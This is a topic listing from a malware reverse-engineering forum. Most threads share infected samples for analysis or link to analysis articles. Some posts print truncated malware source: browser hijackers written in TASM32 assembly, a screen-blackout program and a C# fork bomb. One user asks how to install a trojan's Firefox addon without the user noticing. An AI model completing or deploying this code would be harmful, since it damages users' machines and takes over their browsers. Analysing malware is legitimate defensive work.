Malware Reverse Engineering
Debugging, disassembling and documenting interesting malware...
369 topics in this forum
-
Suspected Malware packed with AsPack
by NewEraCracker - 1 reply
- 7k views
Hello guys, today I found this on a download. I think it's a virus and I found that it is packed with AsPack. I've sent this to Avira, but if you can, please take a look (using an isolated virtual machine). Password: malware. DO THIS ONLY IF YOU ARE EXPERIENCED. I DO NOT KNOW WHAT THIS FILE IS CAPABLE OF. malware.rar
-
take a look
by blackpirate - 5 replies
- 10k views
Hey, I just found a link to an app, let's say very handy to have! I thought that it's too nice to be real, so I scanned the file first on VirusTotal, and without any positive result! Then the bad things happened: after running it, the app created multiple user accounts, locked mine (admin), deleted restore point... very nasty! Can someone debug it? To see what it's all about and if I took any risk? I had some important things on my PC! (passwords etc.) PLEASE BE CAREFUL! RUN IT ON VIRTUAL MACHINE ONLY! FILE: http://www.sendspace.com/file/w04db8 Thanks in advance! BP
-
General Considerations while Reversing Malicious Software
by mcanpuneet - 0 replies
- 3.6k views
I have little experience in reversing Windows executables and DLLs using OllyDbg and some other debuggers. I want to learn malicious software reversing. What general considerations should be taken while reversing any malicious software? Any help will be appreciated. Thanks in advance.
-
CSI Internet - Malware analysis series
by frank_boldewin - 0 replies
- 3.9k views
Hi all, for anyone interested in malware analysis, here are the links to all 5 parts of our CSI Internet series. Part 1: malicious JavaScript http://www.h-online.com/security/features/CSI-Internet-Alarm-at-the-pizza-service-1019940.html?view=print Part 2: malicious MS Office http://www.h-online.com/security/features/CSI-Internet-The-image-of-death-1030311.html?view=print Part 3: malicious PDF http://www.h-online.com/security/features/CSI-Internet-PDF-timebomb-1038864.html?view=print Part 4: malicious Flash (integer overflow analysis) http://www.h-online.com/security/features/CSI-Internet-Attack-of-the-killer-videos-1049197.html?view=print Part 5: malicious f…
-
Malware sample for practice
by GEEK - 13 replies
- 9k views
Hey, found this on my USB so I am guessing it's not a very dangerous virus. I haven't sent it to any online AV checkers, simply because I am not bothered. If anyone wants to practise, I have zipped the unedited binaries. Password: infected. usb_malware_sample.rar
-
Mozilla Hijacker
by JMC31337 - 0 replies
- 5.6k views
felt like p0wning mozilla with tasm32
;tasm32 /ml foxjak
;tlink32 -x -c -aa foxjak,,,import32
.386P
Locals
jumps
.Model Flat ,StdCall
include windows.inc
include vkkey.inc
extrn FindWindowExA:PROC
extrn FindWindowA:PROC
extrn SendMessageA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn SetForegroundWindow:PROC
extrn keybd_event:PROC
extrn Sleep:PROC
extrn SetActiveWindow:PROC
extern ShowWindow:PROC
extrn SetWindowTextA:PROC
extern CreateDirectoryA:PROC
extrn CopyFileA:PROC
extrn RegOpenKeyExA :PROC ;open a key (see chapter _4_), with a subkey
extrn RegCloseKey :PROC ;close a key
extrn RegCreateKeyA :PROC ;create's a new subkey
extrn Re…
-
FAKE AV Virus
by JMC31337 - 0 replies
- 4.7k views
FAKE AV VIRUS. Fake_AV_Aug_2010.rar, RAR password: infected
-
IE8 Browser Hijack
by JMC31337 - 0 replies
- 3.8k views
plenty of examples of an IE 8 hijacker on the net, here's one in tasm32
;tasm32 /ml hijak
;tlink32 -x -c -aa hijak,,,import32
.386P
Locals
jumps
.Model Flat ,StdCall
include windows.inc
extrn FindWindowExA:PROC
extrn FindWindowA:PROC
extrn SendMessageA:PROC
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn SetForegroundWindow:PROC
extrn keybd_event:PROC
extrn Sleep:PROC
VK_RETURN equ 0Dh
SW_SHOWNORMAL equ 1
.data?
buff db ?
.data
hwnd dd 0
ieclass db "IEFrame",0
ieworker db "WorkerW",0
ieadd db "Address Combo Control",0
ienav db "Navigation Bar",0
ierebar db "ReBarWindow32",0
iebar db "ToolBarWindow32",0
ieedit db "Edit",0
ieroot db "Address Band Root",0
addrs db "http://www.goo…
-
Dr.mehdi.swensen PEiD v0.95
by Dr.mehdi.swensen - 12 replies
- 9k views
I give this to all my friends in the forum. I hope it is accepted by all crackers. Thanks. Mod edit: Removed attachment since it's both a rip and a virus. Explain or actions will be taken. Mod edit 2: Uploaded attachment and moved topic to Malicious Software Research forum for discussion. User is banned from the board. Attachment password is: tuts4you Dr.mehdi.swensen PEiD v0.95.zip
-
Dual OS Virus
by cyb3rl0rd1867 - 5 replies
- 7k views
I recently heard about the W32/Simile virus that was dangerous for both Linux and Windows. More info here. I was curious to know what the header of such a file would look like, since Microsoft uses PE headers and Linux uses ELF headers. How would it be possible to make it compatible with both?
-
Malware+Custom Obfusc+No detections
by chickenbutt - 4 replies
- 6.8k views
I didn't look to see what this does, beyond dropping binaries and making services. It has to be rebuilt to load in Olly (the dropped binaries). KIS 2010, NIS 2010 and Avira 2010 didn't detect it with high heuristics. It's all ring 3. dfgdfgdgdgf.zip
-
W32.BlackOut
by JMC31337 - 0 replies
- 6.6k views
black out the GUI
.386
.model flat
extrn MessageBoxA:proc
extrn GetDC:proc
extrn SetPixel:proc
extrn GetSystemMetrics:proc
extrn MessageBoxA:proc
extrn GetPixel:PROC
extrn BitBlt:PROC
.data
xc dd 0 ;width
yc dd 0 ;height
x dd 0 ;x-co
y dd 0 ;y-co
dc dd 0
.code
start:
xor eax,eax
push eax
call GetDC
mov dword ptr dc,eax
push 16
call GetSystemMetrics
mov dword ptr xc,eax
push 17
call GetSystemMetri…
-
Netsky B
by JMC31337 - 3 replies
- 4.8k views
...
-
Flash / PDF 0day Analysis
by frank_boldewin - 5 replies
- 4.3k views
http://blog.zynamics.com/2010/06/09/analyzing-the-currently-exploited-0-day-for-adobe-reader-and-adobe-flash/ Sebastian and I worked on that the last 2 days. Maybe someone is interested. Cheers, Frank
-
C# Rabbit / Fork Bomb
by JMC31337 - 0 replies
- 6.7k views
//JMC31337
//THE MAIN FORM CODE
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Diagnostics;

namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            string startpointPath = Application.ExecutablePath;
            for (int x = 0; x < 999999999; x++)
            {
                MessageBox.Show("RABBIT", "Attention");
                Process.Sta…
-
Silent Firefox addon install
by Minister - 1 reply
- 3.9k views
Good day, I am creating a small trojan and encountered one problem. The trojan installs an addon for FF and the problem is that FF notifies the user about it, spitting out a window with "New addons installed". Any ideas how to bypass it, at least a hint, please? I've googled it and searched in Mozilla support forums, but for obvious reasons, nobody is keen on answering it.
-
Explore the Vulnerability in the following snippets - Help Required
by mystery_reverser - 5 replies
- 6.3k views
Hello guys, I am a newbie to reverse engineering vulnerabilities. Following are some vulnerable code snippets, for which I want to know the answers to the following questions. It would be great if you could explain elaborately so that I can kick-start my vulnerability analysis with a bang. Please help me out, guys. You can mail me the answers at mysteryreverse@gmail.com or post them here as a doc file. Regards, Mystery. Here is the doc file!! Vulnerablitity.zip Vulnerablitity.doc
-
WINDAZ, sLOTz, FALAFEL, KSCRACKiNG
by Aguila - 3 replies
- 6k views
Some guy is spreading his bot via scene releases. Mirc.v7.0.Incl.Keymaker-WiNDAZ Nero.v9.9.4.26.0b.Incl.Keymaker-WiNDAZ ESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ JESET.NOD32.Antivirus.v4.2.42.0.Incl.Keymaker-WiNDAZ Avast.Internet.Security.v5.0.545.Incl.Keymaker-WiNDAZ Jules.v2.0.Cracked-sLOTz Eastern.Slots.v3.0.Cracked-sLOTz Cortez.Treasure.v1.0.Cracked-sLOTz Kaspersky.Keygen.V1.WORKiNG.WiNALL-KSCRACKiNG WINX.HD.CAMCORDER.VIDEO.CONVERTER.V3.0-FALAFEL FRESH.VIEW.V7.94.READ.NFO-FALAFEL FRESH.DOWNLOAD.V8.48.READ.NFO-FALAFEL ........ Let's analyze his "work". idx.exe -> Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - Overlay : 2F7C5C... Nothing discov…
-
Spyware and or adware ?
by iamlegend - 2 replies
- 3.7k views
Hey guys, I know this is maybe not software, but by any chance, do you have an example of a spyware or adware script? Or maybe a site or something out there that has these threats? I need one or two for my research, like AdWare.Win32.Virtumonde or AdWare.Win32.Dm.vv. Thanks in advance.
-
HTML CRYPTO TROJAN
by JMC31337 - 0 replies
- 3.7k views
...
-
Interesting Stuff
by cyb3rl0rd1867 - 5 replies
- 7.1k views
Here are some interesting samples I came across while disinfecting someone's machine. Let me know if you come across something interesting! Kaspersky name: Trojan.win32.scar.bzuz Password: tuts4you syre32.rar
-
- 5 replies
- 4.8k views
An overview with some examples, written by ir3t from Black Storm. Who said girls can't code!!? http://portal.b-at-s.info/download.php?view.454
-
C# Replicator
by JMC31337 - 0 replies
- 4.7k views
... moved to vxheavens
-
Mytob@MM
by JMC31337 - 0 replies
- 3.4k views
...
-
W32 DLL Virii
by JMC31337 - 0 replies
- 10.5k views
...